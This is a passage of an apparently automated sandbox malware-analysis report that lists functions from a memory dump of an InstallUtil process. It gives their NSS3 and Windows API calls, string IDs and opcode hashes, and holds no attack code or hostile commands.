                                                                                                                  • ReleaseMutex.KERNEL32(40C70845,?,6C7E4710,?,000F4240,00000000), ref: 6C7E046B
                                                                                                                  • GetLastError.KERNEL32(?,6C7E4710,?,000F4240,00000000), ref: 6C7E0479
                                                                                                                    • Part of subcall function 6C7FBF80: TlsGetValue.KERNEL32(00000000,?,6C7E461B,-00000004), ref: 6C7FC244
                                                                                                                  • PR_Unlock.NSS3(40C70845,?,6C7E4710,?,000F4240,00000000), ref: 6C7E0492
                                                                                                                  • PR_SetError.NSS3(FFFFE89D,00000000,?,6C7E4710,?,000F4240,00000000), ref: 6C7E04A5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Error$LastMutexReleaseUnlockValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4014558462-0
                                                                                                                  • Opcode ID: b0ac178c588ab6825c39b3253355d7584584775a8c221c62c3cea852f279aca9
                                                                                                                  • Instruction ID: a99afb57dabcdab0b979ab88630e7149c394381b89ff556a33a2b025f7264bd8
                                                                                                                  • Opcode Fuzzy Hash: b0ac178c588ab6825c39b3253355d7584584775a8c221c62c3cea852f279aca9
                                                                                                                  • Instruction Fuzzy Hash: 5AF0B472B102466BEB10ABF99F5CF1A32E99B0720DF45C434E82AC7A91EE21E444D561
                                                                                                                  Function 6C86CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalDeleteSectionfree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2988086103-0
                                                                                                                  • Opcode ID: b4f30d3e2c37df10538941733abc5d95f80fbb8fae2326ebf31e73693a8f06f0
                                                                                                                  • Instruction ID: f586b2a56b44ac29e2026d29535b3261f1b3c0d031797b93f77a75e8e245dca2
                                                                                                                  • Opcode Fuzzy Hash: b4f30d3e2c37df10538941733abc5d95f80fbb8fae2326ebf31e73693a8f06f0
                                                                                                                  • Instruction Fuzzy Hash: 42E030B6700608ABCA10EFA9DC4488A77ACEE492743150535E691C3701D232F905CBE1
                                                                                                                  Function 6C7A4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7A4D57
                                                                                                                  • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C7A4DE6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorR_snprintf
                                                                                                                  • String ID: %d.%d
                                                                                                                  • API String ID: 2298970422-3954714993
                                                                                                                  • Opcode ID: f6dcf3a723da2756648c9a3aea39ebabc1eb52be2b224ed47de79b0c12e31b7d
                                                                                                                  • Instruction ID: ef2331225fd2fb8f632e0087c8dd1b8be588661b58196dabd395e9e55d805ea8
                                                                                                                  • Opcode Fuzzy Hash: f6dcf3a723da2756648c9a3aea39ebabc1eb52be2b224ed47de79b0c12e31b7d
                                                                                                                  • Instruction Fuzzy Hash: 8331F0B2D042196BEB205BE19D06BFF7768DF40308F050539ED1557781EB319906CBE2
                                                                                                                  Function 6C7C4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3('8|l,00000000,00000000,?,?,6C7C3827,?,00000000), ref: 6C7C4D0A
                                                                                                                    • Part of subcall function 6C7B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7B08B4
                                                                                                                  • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C7C4D22
                                                                                                                    • Part of subcall function 6C7AFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C751A3E,00000048,00000054), ref: 6C7AFD56
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                  • String ID: '8|l
                                                                                                                  • API String ID: 1521942269-4049069882
                                                                                                                  • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                  • Instruction ID: 2a170e24fad75e86e210035af7296c2e9c89d8fe90cdbfdb6e0d84765cd6d2c1
                                                                                                                  • Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
                                                                                                                  • Instruction Fuzzy Hash: B0F0C2327002226FEB102D6AAE85B6332DC9B0137DF1403F1EE28DB780E631CC0086A2
                                                                                                                  Function 6C7EAF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_GetUniqueIdentity.NSS3(SSL), ref: 6C7EAF78
                                                                                                                    • Part of subcall function 6C74ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C74ACE2
                                                                                                                    • Part of subcall function 6C74ACC0: malloc.MOZGLUE(00000001), ref: 6C74ACEC
                                                                                                                    • Part of subcall function 6C74ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C74AD02
                                                                                                                    • Part of subcall function 6C74ACC0: TlsGetValue.KERNEL32 ref: 6C74AD3C
                                                                                                                    • Part of subcall function 6C74ACC0: calloc.MOZGLUE(00000001,?), ref: 6C74AD8C
                                                                                                                    • Part of subcall function 6C74ACC0: PR_Unlock.NSS3 ref: 6C74ADC0
                                                                                                                    • Part of subcall function 6C74ACC0: PR_Unlock.NSS3 ref: 6C74AE8C
                                                                                                                    • Part of subcall function 6C74ACC0: free.MOZGLUE(?), ref: 6C74AEAB
                                                                                                                  • memcpy.VCRUNTIME140(6C8B3084,6C8B02AC,00000090), ref: 6C7EAF94
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
                                                                                                                  • String ID: SSL
                                                                                                                  • API String ID: 2424436289-2135378647
                                                                                                                  • Opcode ID: 955d2626461f486dcb91a8858a0e47c789cf64e825f6d8ecfdbcba61038b3031
                                                                                                                  • Instruction ID: 5b19ef7a19343c99a3cded41fb4f7a3e6fbb2dd0aa519bba7c91c248fb48a26e
                                                                                                                  • Opcode Fuzzy Hash: 955d2626461f486dcb91a8858a0e47c789cf64e825f6d8ecfdbcba61038b3031
                                                                                                                  • Instruction Fuzzy Hash: 1B21AAB7608B4AABCA31DF55AB433127FB1BB0B20D7105528C1280BB24DB30680ADFDD
                                                                                                                  Function 6C75C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]ul,6C756499,-00000078,00000000,?,?,]ul,?,6C755DEF,?), ref: 6C75C821
                                                                                                                    • Part of subcall function 6C751DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C751E0B
                                                                                                                    • Part of subcall function 6C751DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C751E24
                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]ul,?,6C755DEF,?,?,?), ref: 6C75C857
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
                                                                                                                  • String ID: ]ul
                                                                                                                  • API String ID: 221937774-1500978261
                                                                                                                  • Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
                                                                                                                  • Instruction ID: f3c06f84233348aa3881f72e89baf3a6cf7dd33704dfaa11d74ac98e4f10ae26
                                                                                                                  • Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
                                                                                                                  • Instruction Fuzzy Hash: D1F08272A0011867EF012966AD09BBA36599B9529AF440031FE1496641FB36DD3583E1
                                                                                                                  Function 6C740F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_GetPageSize.NSS3(6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F1B
                                                                                                                    • Part of subcall function 6C741370: GetSystemInfo.KERNEL32(?,?,?,?,6C740936,?,6C740F20,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000), ref: 6C74138F
                                                                                                                  • PR_NewLogModule.NSS3(clock,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F25
                                                                                                                    • Part of subcall function 6C741110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C740936,00000001,00000040), ref: 6C741130
                                                                                                                    • Part of subcall function 6C741110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C740936,00000001,00000040), ref: 6C741142
                                                                                                                    • Part of subcall function 6C741110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C740936,00000001), ref: 6C741167
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoModulePageSecureSizeSystemcallocstrdup
                                                                                                                  • String ID: clock
                                                                                                                  • API String ID: 536403800-3195780754
                                                                                                                  • Opcode ID: 94387648e5f6e87b8f2a90562de910ccce880b9cd742e6e9eab4432f0d0cb1fa
                                                                                                                  • Instruction ID: a90c89a65c0eb5cb155e6f1ab86f79afb3b86edb156cedb2065a5aae6d4762a4
                                                                                                                  • Opcode Fuzzy Hash: 94387648e5f6e87b8f2a90562de910ccce880b9cd742e6e9eab4432f0d0cb1fa
                                                                                                                  • Instruction Fuzzy Hash: 34D0123160815457C52177979E4DB96B7BCC7C32BEF10CC76E12841E104A6890FBD3A9
                                                                                                                  Function 6C7B0DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$calloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3339632435-0
                                                                                                                  • Opcode ID: 7e3aafa15a8faff9120726bf49eefe1b95d74e70934d1fd40dbdfc75d6c706aa
                                                                                                                  • Instruction ID: c28738dc11a1d2f237915608eefc46c1b05ed16a590abb8b350d66eff98ada79
                                                                                                                  • Opcode Fuzzy Hash: 7e3aafa15a8faff9120726bf49eefe1b95d74e70934d1fd40dbdfc75d6c706aa
                                                                                                                  • Instruction Fuzzy Hash: 5E31A3F06443818FDB107F78C78866977B8BF1634CF014679E8989BA11EB34D495CB82
                                                                                                                  Function 6C70A4E0 Relevance: 5.1, APIs: 4, Instructions: 75stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,6C70A468,00000000), ref: 6C70A4F9
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C70A468,00000000), ref: 6C70A51B
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C70A468,?,6C70A468,00000000), ref: 6C70A545
                                                                                                                  • memcpy.VCRUNTIME140(00000001,6C70A468,00000001,?,?,?,6C70A468,00000000), ref: 6C70A57D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$memcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3396830738-0
                                                                                                                  • Opcode ID: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
                                                                                                                  • Instruction ID: e4a1955db1bfb272f6324a1963a5f2bda38951eb0220a59a762c090f3376e445
                                                                                                                  • Opcode Fuzzy Hash: 600eb8a033a5ca9a43437b08be08586c367961074f3215d643a34829541b8b4a
                                                                                                                  • Instruction Fuzzy Hash: 361129F3E0031557DB0089BADD81AAB77D9AF96278F280635ED248B7C0F635D90883E1
                                                                                                                  Function 6C7B0F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C752AF5,?,?,?,?,?,6C750A1B,00000000), ref: 6C7B0F1A
                                                                                                                  • malloc.MOZGLUE(00000001), ref: 6C7B0F30
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7B0F42
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7B0F5B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Valuemallocmemcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2332725481-0
                                                                                                                  • Opcode ID: 0e87e71e0a88e8cac99f3f6d5400c981130025ade70bf8c45b1ab450b00283ea
                                                                                                                  • Instruction ID: 009ae0cf72c53f7b00e0a19d84dc2fb69a20775b7485c25c33d4f41ad9ef55ef
                                                                                                                  • Opcode Fuzzy Hash: 0e87e71e0a88e8cac99f3f6d5400c981130025ade70bf8c45b1ab450b00283ea
                                                                                                                  • Instruction Fuzzy Hash: AA01B5F1B002905FE7202F3E9F089667AACEF5229DB010531E818D6A21EB31C955C6E2